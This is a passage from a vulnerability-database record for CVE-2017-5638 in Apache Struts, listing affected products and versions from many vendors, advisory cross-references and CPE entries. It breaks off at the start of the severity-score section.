    iQEcBAEBCAAGBQJY3BR/AAoJELXhAxt7SZaiMW8H/0+jWL4Evk+KeqP7aYk1msGp 9ih3F2680VrHVsUbSzul3+svnaWTJUgRe7fUTvsh/Q6bx/Eo86yo8iXGjmzETLtY cTuQrHLySo55Pwua9+89V4e13QkRvQ/UmQPYDMPEk9L7wwU9OF0oCpXHQBuWnw07 mKLZ12HaZqM8vJXgwgJFH77Mf3r5TkGFHsrZ0M+2vvxioJIEfmWV/x4eqtvIy6zS C6CX1M9x4xD442XcFfnH0BHA9RL6LOeYngTPYR7IIycvzpqd8kOWunjs38+IJpFR g49ho/NddeZfDKdJcIdfJ+0f3x2h7FPiVadXu1PzdCckhFHkHmrSlVcRbQZ+1R8= =8ljI -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201703-0755",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "apache struts",
            "version": null
          },
          {
            "model": "struts",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "model": "weblogic server",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.2.1.2.0"
          },
          {
            "model": "weblogic server",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.2.1.1.0"
          },
          {
            "model": "storage v5030",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "lenovo",
            "version": "7.7.1.6"
          },
          {
            "model": "struts",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.5.0"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hp",
            "version": "10.0.0"
          },
          {
            "model": "storwize v3500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ibm",
            "version": "7.7.1.6"
          },
          {
            "model": "oncommand balance",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netapp",
            "version": null
          },
          {
            "model": "struts",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.32"
          },
          {
            "model": "storage v5030",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "lenovo",
            "version": "7.8.1.0"
          },
          {
            "model": "weblogic server",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "10.3.6.0.0"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hp",
            "version": "10.2.0"
          },
          {
            "model": "storwize v5000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ibm",
            "version": "7.8.1.0"
          },
          {
            "model": "storwize v7000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ibm",
            "version": "7.8.1.0"
          },
          {
            "model": "struts",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.5.10.1"
          },
          {
            "model": "storwize v7000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ibm",
            "version": "7.7.1.6"
          },
          {
            "model": "clearpass policy manager",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "arubanetworks",
            "version": "6.6.5"
          },
          {
            "model": "weblogic server",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.1.3.0.0"
          },
          {
            "model": "storwize v5000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ibm",
            "version": "7.7.1.6"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hp",
            "version": "10.5.0"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hp",
            "version": "10.1.0"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hp",
            "version": "9.1.0"
          },
          {
            "model": "storwize v3500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ibm",
            "version": "7.8.1.0"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.30"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.5.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.5.7"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.5.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.5.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.5.10"
          },
          {
            "model": "struts",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "apache",
            "version": "2.3.5 from  2.3.31"
          },
          {
            "model": "struts",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "apache",
            "version": "2.5 from  2.5.10"
          },
          {
            "model": "esmpro/servermanager",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "6.10 to  6.16"
          },
          {
            "model": "infoframe relational store",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "hs series  5.0.5"
          },
          {
            "model": "staroffice x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise v4.0"
          },
          {
            "model": "staroffice x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise v5.0"
          },
          {
            "model": "staroffice x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise v5.1"
          },
          {
            "model": "staroffice x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard v4.0"
          },
          {
            "model": "staroffice x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard v5.0"
          },
          {
            "model": "staroffice x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard v5.1"
          },
          {
            "model": "webotx developer",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "\"(with developers studio) v9.3\""
          },
          {
            "model": "webotx developer",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "\"(with developers studio) v9.4\""
          },
          {
            "model": "hirdb",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hitachi",
            "version": "server version 9"
          },
          {
            "model": "hirdb control manager",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hitachi",
            "version": "- server version 9"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apache",
            "version": "2.5.4"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apache",
            "version": "2.5.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apache",
            "version": "2.5.6"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apache",
            "version": "2.5.9"
          },
          {
            "model": "vrealize operations manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "6.0"
          },
          {
            "model": "vrealize hyperic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.0"
          },
          {
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "6.5"
          },
          {
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "6.0"
          },
          {
            "model": "horizon desktop as-a-service platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "7.0"
          },
          {
            "model": "horizon desktop as-a-service platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "6.0"
          },
          {
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.18.0"
          },
          {
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1.2.0"
          },
          {
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1.1.0"
          },
          {
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1.0.0"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.4"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.1"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.3.0"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "smsgw v100r003c01",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "smsgw v100r002c11",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "smsgw v100r002c01",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "secospace antiddos8030 v100r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "imanager neteco v600r007c91",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "6000"
          },
          {
            "model": "imanager neteco v600r007c90",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "6000"
          },
          {
            "model": "imanager neteco v600r007c80",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "6000"
          },
          {
            "model": "imanager neteco v600r008c20",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "imanager neteco v600r008c10",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "imanager neteco v600r008c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "imanager neteco v600r007c60spc100",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "imanager neteco v600r007c50",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "imanager neteco v600r007c11",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "espace ecs v300r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "espace ecs v200r003c10",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "espace ecs v200r003c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "espace ecs v200r002c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "model": "universal cmdb foundation software cup5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.22"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.16"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.15"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.14"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.13"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.12"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.10"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.50"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.20"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.10"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.02"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.01"
          },
          {
            "model": "server automation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.00"
          },
          {
            "model": "virtualized voice browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unity connection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified sip proxy software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified intelligent contact management enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified intelligence center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified contact center express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified contact center enterprise live data server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "-0"
          },
          {
            "model": "unified contact center enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified communications manager session management edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified communications manager im \u0026 presence service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "socialminer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "prime service catalog appliance and virtual appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "prime license manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "packaged contact center enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "mediasense",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "identity services engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hosted collaboration solution for contact center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hosted collaboration mediation fulfillment",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "finesse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "emergency responder",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "hipchat server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.0"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.11"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.10.1"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9.5"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9.4"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9.3"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9.2"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9.1"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.8.8"
          },
          {
            "model": "crowd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.8.3"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.15"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.12"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.11"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.10"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.1"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.12.3.1"
          },
          {
            "model": "bamboo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.11.4.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.31"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.28"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.24"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.5.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.7"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.29"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.20"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.12"
          },
          {
            "model": "vcenter server 6.5b",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": null
          },
          {
            "model": "sterling selling and fulfillment foundation 9.5.0-sfp2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": "sterling selling and fulfillment foundation 9.4.0-sfp3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": "sterling selling and fulfillment foundation 9.3.0-sfp5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": "sterling selling and fulfillment foundation sfp6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.1-"
          },
          {
            "model": "sterling selling and fulfillment foundation sfp6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.0-"
          },
          {
            "model": "sterling selling and fulfillment foundation sfp6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0-"
          },
          {
            "model": "virtualized voice browser su1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5"
          },
          {
            "model": "unity connection",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.0"
          },
          {
            "model": "unity connection",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5"
          },
          {
            "model": "unity connection",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.0"
          },
          {
            "model": "unified sip proxy software",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.1"
          },
          {
            "model": "unified intelligent contact management enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5(1)"
          },
          {
            "model": "unified intelligent contact management enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.0(2)"
          },
          {
            "model": "unified intelligent contact management enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.5(3)"
          },
          {
            "model": "unified intelligent contact management enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.0(2)"
          },
          {
            "model": "unified intelligence center es03",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5(1)"
          },
          {
            "model": "unified contact center express su1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5"
          },
          {
            "model": "unified contact center enterprise live data server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "-11.5(1)"
          },
          {
            "model": "unified contact center enterprise live data server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "-11.0(2)"
          },
          {
            "model": "unified contact center enterprise live data server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "-10.5(3)"
          },
          {
            "model": "unified contact center enterprise live data server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "-10.0(2)"
          },
          {
            "model": "unified contact center enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5(1)"
          },
          {
            "model": "unified contact center enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.0(2)"
          },
          {
            "model": "unified contact center enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.5(3)"
          },
          {
            "model": "unified contact center enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.0(2)"
          },
          {
            "model": "socialminer su1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5"
          },
          {
            "model": "prime license manager 11.5 su1a",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "mediasense",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5"
          },
          {
            "model": "hosted collaboration solution for contact center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5(1)"
          },
          {
            "model": "hosted collaboration solution for contact center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.0(2)"
          },
          {
            "model": "hosted collaboration solution for contact center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.5(3)"
          },
          {
            "model": "hosted collaboration solution for contact center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.0(2)"
          },
          {
            "model": "finesse es2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "11.5"
          },
          {
            "model": "hipchat server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.2.2"
          },
          {
            "model": "crowd",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.11.1"
          },
          {
            "model": "crowd",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.10.3"
          },
          {
            "model": "crowd",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "2.9.7"
          },
          {
            "model": "bamboo",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.15.3"
          },
          {
            "model": "bamboo",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "atlassian",
            "version": "5.14.5"
          },
          {
            "model": "struts",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.5.10.1"
          },
          {
            "model": "struts",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.32"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "BID",
            "id": "96729"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:apache:struts",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:esmpro_servermanager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:infoframe_relational_store",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:istorage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:staroffice_x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_developer",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:hitachi:hirdb",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:hitachi:hirdb_control_manager",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nike Zheng",
        "sources": [
          {
            "db": "BID",
            "id": "96729"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-5638",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
